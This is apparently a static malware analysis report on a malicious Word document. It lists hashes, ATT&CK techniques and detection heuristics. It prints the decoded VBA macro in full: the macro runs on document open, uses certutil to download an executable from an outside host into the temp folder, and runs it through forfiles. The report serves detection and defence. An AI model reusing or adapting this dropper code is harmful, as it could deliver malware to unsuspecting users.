Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7b331459324f82d…

MALICIOUS

Office (OLE)

118.0 KB Created: 2019-08-27 10:59:00 Authoring application: Microsoft Office Word First seen: 2019-10-30
MD5: bf01fddc5befac4265490fb7be790ca3 SHA-1: d38365a589f039e5fd8dff95d64b49db9560e01d SHA-256: d7b331459324f82d571b4e67e16417fd770a61c6cbaa6b3bdf3a7e29cc2661d2
190 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The critical OLE_VBA_SHELL and OLE_VBA_OBFUSCATED_SHELL_URL heuristics indicate the presence of a malicious VBA macro. The macro constructs the URL "http://regular.pk/sys/microsoftoffice.exe" and uses the Shell() function to download and execute it. It then uses 'forfiles' to execute the downloaded file, likely a second-stage payload.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://regular.pk/sys/microsoftoffice.bbc Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1005 bytes
SHA-256: 31b661851301fa4df90c325d9fdfa8f836fd5552730e6d3900466c8f1564a639
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
zzzz
End Sub
Sub zzzz()
fb = Replace(("http://regular.pk/sys/microsoftoffice.bbc"), "bbc", "exe")
hh = Replace(fb, "qsohf", "https://")
trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("filename.bbc", "bbc", "exe")
Dim dd As String
Shell ("c" + "e" + "r" + "t" + "u" + "t" + "i" + "l" + "." + "e" + "x" + "e" & " -urlcache -split -f " & hh & " " & trfutyjnih), vbHide
rthybfhd (60)
Shell ("forfiles /p c:\windows\system32 /m notepad.exe /c " & trfutyjnih), vbHide
End Sub
Sub rthybfhd(sec)
    Dim temp
    temp = Timer
    Do While Timer - temp < sec
    Loop
End Sub

Attribute VB_Name = "NewMacros"
Sub test1()
'
' test1 Macro
'
'

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.